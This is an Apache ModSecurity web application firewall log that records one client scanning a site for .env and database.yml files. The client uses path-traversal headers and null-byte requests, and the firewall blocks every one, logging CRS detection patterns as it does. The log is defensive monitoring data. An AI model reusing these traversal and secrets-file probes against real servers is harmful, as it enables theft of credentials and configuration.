[Tue May 12 04:39:33.704762 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS5c1tk6y7yBJLpJop0gAAAII"], referer: https://tchatbooster.com/.env.production
[Tue May 12 04:39:33.705014 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS5c1tk6y7yBJLpJop0gAAAII"], referer: https://tchatbooster.com/.env.production
[Tue May 12 04:39:33.997751 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5Tue9Sp-pIv_Bb61XgAAAUQ"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:34.025953 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5jue9Sp-pIv_Bb61YAAAAVE"]
[Tue May 12 04:39:34.026007 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5jue9Sp-pIv_Bb61YAAAAVE"]
[Tue May 12 04:39:34.026042 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5jue9Sp-pIv_Bb61YAAAAVE"]
[Tue May 12 04:39:34.026248 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5jue9Sp-pIv_Bb61YAAAAVE"]
[Tue May 12 04:39:34.026293 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5jue9Sp-pIv_Bb61YAAAAVE"]
[Tue May 12 04:39:34.026322 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5jue9Sp-pIv_Bb61YAAAAVE"]
[Tue May 12 04:39:34.026718 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5jue9Sp-pIv_Bb61YAAAAVE"]
[Tue May 12 04:39:34.049740 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5c1tk6y7yBJLpJop0QAAAIU"]
[Tue May 12 04:39:34.209591 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5c1tk6y7yBJLpJop0gAAAII"], referer: https://tchatbooster.com/.env.production
[Tue May 12 04:39:34.240848 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKS5s1tk6y7yBJLpJop0wAAAIU"]
[Tue May 12 04:39:34.241020 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKS5s1tk6y7yBJLpJop0wAAAIU"]
[Tue May 12 04:39:34.489931 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5jue9Sp-pIv_Bb61YAAAAVE"]
[Tue May 12 04:39:34.506670 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5s1tk6y7yBJLpJop1QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:34.506719 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5s1tk6y7yBJLpJop1QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:34.506751 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5s1tk6y7yBJLpJop1QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:34.506781 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5s1tk6y7yBJLpJop1QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:34.506996 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5s1tk6y7yBJLpJop1QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:34.507049 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5s1tk6y7yBJLpJop1QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:34.507082 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5s1tk6y7yBJLpJop1QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:34.507474 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS5s1tk6y7yBJLpJop1QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:34.584990 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKS5jue9Sp-pIv_Bb61YgAAAVE"]
[Tue May 12 04:39:34.585207 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKS5jue9Sp-pIv_Bb61YgAAAVE"]
[Tue May 12 04:39:34.703119 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5s1tk6y7yBJLpJop0wAAAIU"]
[Tue May 12 04:39:34.728538 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKS5jue9Sp-pIv_Bb61YwAAAUQ"], referer: https://tchatbooster.com/.env.staging
[Tue May 12 04:39:34.728808 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.staging"] [unique_id "agKS5jue9Sp-pIv_Bb61YwAAAUQ"], referer: https://tchatbooster.com/.env.staging
[Tue May 12 04:39:34.994010 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 31 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5s1tk6y7yBJLpJop1QAAAII"], referer: https://tchatbooster.com/api/v1?X-App-Env=%00
[Tue May 12 04:39:35.016853 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS581tk6y7yBJLpJop1gAAAIU"]
[Tue May 12 04:39:35.016925 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS581tk6y7yBJLpJop1gAAAIU"]
[Tue May 12 04:39:35.016956 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS581tk6y7yBJLpJop1gAAAIU"]
[Tue May 12 04:39:35.017162 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS581tk6y7yBJLpJop1gAAAIU"]
[Tue May 12 04:39:35.017214 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS581tk6y7yBJLpJop1gAAAIU"]
[Tue May 12 04:39:35.017246 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/api/v1"] [unique_id "agKS581tk6y7yBJLpJop1gAAAIU"]
